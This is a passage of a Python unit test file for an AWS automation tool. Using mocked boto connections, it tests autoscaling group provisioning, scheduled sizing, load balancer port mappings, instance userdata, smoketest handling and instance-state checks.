aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1)
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertTrue(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hc_simple_with_no_chaos(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group with no chaos
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1,
chaos="False")
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertFalse(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hc_with_chaos_using_config(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group with chaos from config
"""
config_dict = get_default_config_dict()
config_dict["mhcunittest"]["chaos"] = "True"
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME,
log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1)
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertTrue(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_schedules(self, mock_config, **kwargs):
"""
Provision creates the proper autoscaling group sizes with scheduled sizes
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="1@1 0 * * *:2@6 0 * * *",
desired_size="2@1 0 * * *:3@6 0 * * *",
max_size="6@1 0 * * *:9@6 0 * * *")
_ag = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag['min_size'], 1) # minimum of listed sizes
self.assertEqual(_ag['desired_capacity'], 3) # maximum of listed sizes
self.assertEqual(_ag['max_size'], 9) # maximum of listed sizes
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_sched_some_none(self, mock_config, **kwargs):
"""
Provision creates the proper autoscaling group sizes with scheduled sizes
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="",
desired_size="2@1 0 * * *:3@6 0 * * *", max_size="")
_ag = aws.discogroup.get_existing_groups()[0]
print("({0}, {1}, {2})".format(_ag['min_size'], _ag['desired_capacity'], _ag['max_size']))
self.assertEqual(_ag['min_size'], 0) # minimum of listed sizes
self.assertEqual(_ag['desired_capacity'], 3) # maximum of listed sizes
self.assertEqual(_ag['max_size'], 3) # maximum of listed sizes
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_sched_all_none(self, mock_config, **kwargs):
"""
Provision creates the proper autoscaling group sizes with scheduled sizes
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="", desired_size="", max_size="")
_ag0 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag0['min_size'], 0) # minimum of listed sizes
self.assertEqual(_ag0['desired_capacity'], 0) # maximum of listed sizes
self.assertEqual(_ag0['max_size'], 0) # maximum of listed sizes
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="3", desired_size="6", max_size="9")
_ag1 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag1['min_size'], 3) # minimum of listed sizes
self.assertEqual(_ag1['desired_capacity'], 6) # maximum of listed sizes
self.assertEqual(_ag1['max_size'], 9) # maximum of listed sizes
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="", desired_size="", max_size="")
_ag2 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag2['min_size'], 3) # minimum of listed sizes
self.assertEqual(_ag2['desired_capacity'], 6) # maximum of listed sizes
self.assertEqual(_ag2['max_size'], 9) # maximum of listed sizes
@patch_disco_aws
def test_update_elb_delete(self, mock_config, **kwargs):
'''Update ELB deletes ELBs that are no longer configured'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, elb=MagicMock())
aws.elb.get_elb = MagicMock(return_value=True)
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcfoo", update_autoscaling=False)
aws.elb.delete_elb.assert_called_once_with("mhcfoo")
def _get_elb_config(self, overrides=None):
overrides = overrides or {}
config = get_default_config_dict()
config["mhcelb"] = {
"subnet": "intranet",
"security_group": "intranet",
"ssh_key_name": "unittestkey",
"instance_profile_name": "unittestprofile",
"public_ip": "False",
"ip_address": None,
"eip": None,
"domain_name": "example.com",
"elb": "yes",
"elb_health_check_url": "/foo",
"product_line": "mock_productline"
}
config["mhcelb"].update(overrides)
return get_mock_config(config)
@mock_elb
@patch_disco_aws
def test_update_elb_all_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with default port and protocol values if all are missing
"""
aws = DiscoAWS(config=self._get_elb_config(), environment_name=TEST_ENV_NAME, elb=MagicMock())
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 80, 'HTTP'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_some_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with default port and protocol values if some are missing
"""
overrides = {
'elb_instance_port': '80, 80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443',
'elb_protocol': 'HTTPS, HTTPS'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_no_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with port and protocol values
"""
overrides = {
'elb_instance_port': '80, 80, 27017',
'elb_instance_protocol': 'HTTP, HTTP, TCP',
'elb_port': '443, 443, 27017',
'elb_protocol': 'HTTPS, HTTPS, TCP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(27017, 'TCP', 27017, 'TCP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_single(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with port and protocol values for a single port and protocol
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443',
'elb_protocol': 'HTTPS'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_lowercase(self, mock_config, **kwargs):
"""
update_elb accepts lowercase protocols
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'http',
'elb_port': '443',
'elb_protocol': 'https'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_mismatch(self, mock_config, **kwargs):
"""
update_elb sets instance=ELB when given mismatched numbers of instance and ELB ports
"""
overrides = {
'elb_instance_port': '80, 9001',
'elb_instance_protocol': 'HTTP, HTTP',
'elb_port': '443, 80, 9002',
'elb_protocol': 'HTTPS, HTTP, HTTP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(9001, 'HTTP', 80, 'HTTP'),
DiscoELBPortMapping(9002, 'HTTP', 9002, 'HTTP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_mismatch_no_external(self, mock_config, **kwargs):
"""
update_elb sets instance=ELB when given a single instance port/protocol and no ELB port/protocol
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 80, 'HTTP'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_replicate(self, mock_config, **kwargs):
"""
update_elb replicates the instance configuration when given a single instance port and protocol
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443, 9001',
'elb_protocol': 'HTTPS, HTTP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 9001, 'HTTP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@patch_disco_aws
def test_create_userdata_with_eip(self, **kwargs):
"""
create_userdata sets 'eip' key when an EIP is required
"""
config_dict = get_default_config_dict()
eip = "54.201.250.76"
config_dict["mhcunittest"]["eip"] = eip
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser")
self.assertEqual(user_data["eip"], eip)
@patch_disco_aws
def test_create_userdata_with_zookeeper(self, **kwargs):
"""
create_userdata sets 'zookeepers' key
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser")
self.assertEqual(user_data["zookeepers"], "[\\\"mhczookeeper-{}.example.com:2181\\\"]".format(
aws.vpc.environment_name))
@patch_disco_aws
def test_create_userdata_with_spotinst(self, **kwargs):
"""
create_userdata sets 'spotinst' key
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser", is_spotinst=True)
self.assertEqual(user_data["is_spotinst"], "1")
@patch_disco_aws
def test_create_userdata_without_spotinst(self, **kwargs):
"""
create_userdata doesn't set 'spotinst' key
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser", is_spotinst=False)
self.assertEqual(user_data["is_spotinst"], "0")
@patch_disco_aws
def test_smoketest_all_good(self, mock_config, **kwargs):
'''smoketest_once raises TimeoutError if instance is not tagged as smoketested'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.tags.get = MagicMock(return_value="100")
self.assertTrue(aws.smoketest_once(self.instance))
@patch_disco_aws
def test_smoketest_once_is_terminated(self, mock_config, **kwargs):
'''smoketest_once raises SmokeTestError if instance has terminated'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
with patch("disco_aws_automation.DiscoAWS.is_terminal_state", return_value=True):
self.assertRaises(SmokeTestError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_once_no_instance(self, mock_config, **kwargs):
'''smoketest_once Converts instance not found to TimeoutError'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.update = MagicMock(side_effect=EC2ResponseError(
400, "Bad Request",
body={
"RequestID": "df218052-63f2-4a11-820f-542d97d078bd",
"Error": {"Code": "InvalidInstanceID.NotFound", "Message": "test"}}))
self.assertRaises(TimeoutError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_once_passes_exception(self, mock_config, **kwargs):
'''smoketest_once passes random EC2ResponseErrors'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.update = MagicMock(side_effect=EC2ResponseError(
400, "Bad Request",
body={
"RequestID": "df218052-63f2-4a11-820f-542d97d078bd",
"Error": {"Code": "Throttled", "Message": "test"}}))
self.assertRaises(EC2ResponseError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_not_tagged(self, mock_config, **kwargs):
'''smoketest_once raises TimeoutError if instance is not tagged as smoketested'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.tags.get = MagicMock(return_value=None)
self.assertRaises(TimeoutError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_is_terminal_state_updates(self, mock_config, **kwargs):
'''is_terminal_state calls instance update'''
DiscoAWS.is_terminal_state(self.instance)
self.assertEqual(self.instance.update.call_count, 1)
@patch_disco_aws
def test_is_terminal_state_termianted(self, mock_config, **kwargs):
'''is_terminal_state returns true if instance has terminated or failed to start'''
self.instance.state = "terminated"
self.assertTrue(DiscoAWS.is_terminal_state(self.instance))
self.instance.state = "failed"
self.assertTrue(DiscoAWS.is_terminal_state(self.instance))
@patch_disco_aws
def test_is_terminal_state_running(self, mock_config, **kwargs):
'''is_terminal_state returns false for running instance'''
self.assertFalse(DiscoAWS.is_terminal_state(self.instance))
@patch_disco_aws
def test_is_running_updates(self, mock_config, **kwargs):
'''is_running calls instance update'''
DiscoAWS.is_running(self.instance)
self.assertEqual(self.instance.update.call_count, 1)
@patch_disco_aws
def test_is_running_termianted(self, mock_config, **kwargs):
'''is_running returns false if instance has terminated'''
self.instance.state = "terminated"
self.assertFalse(DiscoAWS.is_running(self.instance))
@patch_disco_aws
def test_is_running_running(self, mock_config, **kwargs):
'''is_running returns true for running instance'''
self.assertTrue(DiscoAWS.is_running(self.instance))
@patch_disco_aws
def test_instances_from_amis(self, mock_config, **kwargs):
'''test get instances using ami ids '''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instance = create_autospec(boto.ec2.instance.Instance)
instance.id = "i-123123aa"
instances = [instance]
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678'), instances)
aws.instances.assert_called_with(filters={"image_id": 'ami-12345678'}, instance_ids=None)
@patch_disco_aws
def test_instances_from_amis_with_group_name(self, mock_config, **kwargs):
'''test get instances using ami ids in a specified group name'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instance = create_autospec(boto.ec2.instance.Instance)
instance.id = "i-123123aa"
instances = [instance]
aws.instances_from_asgs = MagicMock(return_value=instances)
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678', group_name='test_group'), instances)
aws.instances_from_asgs.assert_called_with(['test_group'])
@patch_disco_aws
def test_instances_from_amis_with_launch_date(self, mock_config, **kwargs):
'''test get instances using ami ids and with date after a specified date time'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
now = datetime.utcnow()
instance1 = create_autospec(boto.ec2.instance.Instance)
instance1.id = "i-123123aa"
instance1.launch_time = str(now + timedelta(minutes=10))
instance2 = create_autospec(boto.ec2.instance.Instance)
instance2.id = "i-123123ff"
instance2.launch_time = str(now - timedelta(days=1))
instances = [instance1, instance2]
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678', launch_time=now),
[instance1])
aws.instances.assert_called_with(filters={"image_id": 'ami-12345678'}, instance_ids=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_amiid(self, mock_config, **kwargs):
'''test wait for autoscaling using the ami id to identify the instances'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1)
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name=None, launch_time=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_gp_name(self, mock_config, **kwargs):
'''test wait for autoscaling using the group name to identify the instances'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1, group_name='test_group')
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name='test_group',
launch_time=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_time(self, mock_config, **kwargs):
'''test wait for autoscaling using the ami id to identify the instances and the launch time'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
yesterday = datetime.utcnow() - timedelta(days=1)
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1, launch_time=yesterday)
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name=None,
launch_time=yesterday)
